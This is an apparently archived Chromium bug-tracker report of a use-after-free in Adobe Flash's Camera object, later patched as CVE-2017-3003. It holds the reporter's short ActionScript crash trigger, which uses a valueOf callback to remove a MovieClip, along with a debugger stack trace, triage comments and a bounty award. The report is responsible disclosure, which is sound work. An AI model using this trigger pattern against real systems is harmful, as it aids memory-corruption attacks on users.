Issue metadata
Sign in to add a comment
|
Security: Adobe Flash Camera Object Use After Free
Reported by
xiong12...@gmail.com,
Dec 23 2016
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Adobe Flash Camera Object Use After Free
VERSION
Chrome Version: 56.0.2924.28 beta (64-bit)
Operating System: Windows 7 en 64-bit
REPRODUCTION CASE
Open "TestCamera.html.html" with chrome.
When the camera settings dialog pops up, click "deny" button, then observe chrome crash.
This is a use after free bug when using the camera object.
The function ASnative(2107, 0) takes a number parameter, if we pass in an object with valueOf callback function and removes the
MovieClip in the callback function, a use-after-free occurs:
var my_cam:Camera = Camera.get();
var my_video:Video = display.video;
var mc:MovieClip = _root.createEmptyMovieClip("mc", _root.getNextHighestDepth());
mc.func = _global.ASnative(2107, 0);
my_video.attachVideo(my_cam);
my_cam.onStatus = function(infoObj:Object) {
if (my_cam.muted) {
var aaa = mc.func( { valueOf:function() {
mc.removeMovieClip();
return -2;
}});
}
};
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
(1b1c.1d40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\yuki\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll -
pepflashplayer!PPP_ShutdownBroker+0x26edd9:
000007fe`d43c3569 488b7a50 mov rdi,qword ptr [rdx+50h] ds:00000000`00000050=????????????????
8:097> k
Child-SP RetAddr Call Site
00000000`0019cc50 000007fe`d43beae9 pepflashplayer!PPP_ShutdownBroker+0x26edd9
00000000`0019cd20 000007fe`d4364a53 pepflashplayer!PPP_ShutdownBroker+0x26a359
00000000`0019cd80 000007fe`d4541c5a pepflashplayer!PPP_ShutdownBroker+0x2102c3
00000000`0019cf90 000007fe`d43bf985 pepflashplayer!PPP_ShutdownBroker+0x3ed4ca
00000000`0019d740 000007fe`d443597a pepflashplayer!PPP_ShutdownBroker+0x26b1f5
00000000`0019d850 000007fe`d43c4422 pepflashplayer!PPP_ShutdownBroker+0x2e11ea
00000000`0019d880 000007fe`d43bd8e7 pepflashplayer!PPP_ShutdownBroker+0x26fc92
00000000`0019d8d0 000007fe`d43c1d27 pepflashplayer!PPP_ShutdownBroker+0x269157
00000000`0019d940 000007fe`d43bd69f pepflashplayer!PPP_ShutdownBroker+0x26d597
00000000`0019d9a0 000007fe`d43c4192 pepflashplayer!PPP_ShutdownBroker+0x268f0f
00000000`0019d9f0 000007fe`d4364a53 pepflashplayer!PPP_ShutdownBroker+0x26fa02
00000000`0019da20 000007fe`d4365a38 pepflashplayer!PPP_ShutdownBroker+0x2102c3
00000000`0019dc30 000007fe`d4342d9e pepflashplayer!PPP_ShutdownBroker+0x2112a8
00000000`0019dc90 000007fe`d453c000 pepflashplayer!PPP_ShutdownBroker+0x1ee60e
00000000`0019dd90 000007fe`d4541a70 pepflashplayer!PPP_ShutdownBroker+0x3e7870
00000000`0019de00 000007fe`d430cc79 pepflashplayer!PPP_ShutdownBroker+0x3ed2e0
00000000`0019e5b0 000007fe`d431045a pepflashplayer!PPP_ShutdownBroker+0x1b84e9
00000000`0019e650 000007fe`d41663ae pepflashplayer!PPP_ShutdownBroker+0x1bbcca
00000000`0019e950 000007fe`d416419c pepflashplayer!PPP_ShutdownBroker+0x11c1e
00000000`0019e990 000007fe`d4169176 pepflashplayer!PPP_ShutdownBroker+0xfa0c
Credit:
Please credit "Yuki Chen of Qihoo 360 Vulcan Team" for this bug.
,
Dec 24 2016
,
Dec 24 2016
,
Dec 24 2016
,
Jan 26 2017
,
Feb 13 2017
,
Feb 14 2017
Reported this today
,
Feb 15 2017
This is PSIRT-6396
,
Mar 6 2017
Yuki, I can't see the PoC anymore, did you delete it? Can you attach it again?
,
Mar 10 2017
,
Mar 10 2017
This will be fixed in March as CVE-2017-3003.
,
Mar 28 2017
Thank you for the status update. Is it possible for this case to go to reward panel now?
,
Apr 20 2017
,
Jun 6 2017
,
Jul 26 2017
,
Sep 6 2017
,
Oct 18 2017
,
Nov 8 2017
Hello, Since this vulnerability was fixed in March 2017. Is it possible for this case to go to reward panel now?
,
Nov 8 2017
,
Nov 9 2017
,
Nov 11 2017
,
Nov 11 2017
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 13 2017
Pls apply appropriate OSs label. +awhalley@ for M63 merge review.
,
Nov 14 2017
No merge needed for Flash bugs.
,
Nov 16 2017
*** Boilerplate reminders! *** Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing. *********************************
,
Nov 16 2017
Thanks! The VRP panel decided to award $3,000 to this, 676778 and issue 676773 !
,
Nov 16 2017
,
Feb 15 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by aarya@google.com
, Dec 24 2016Owner: natashenka@google.com
Status: ExternalDependency (was: Unconfirmed)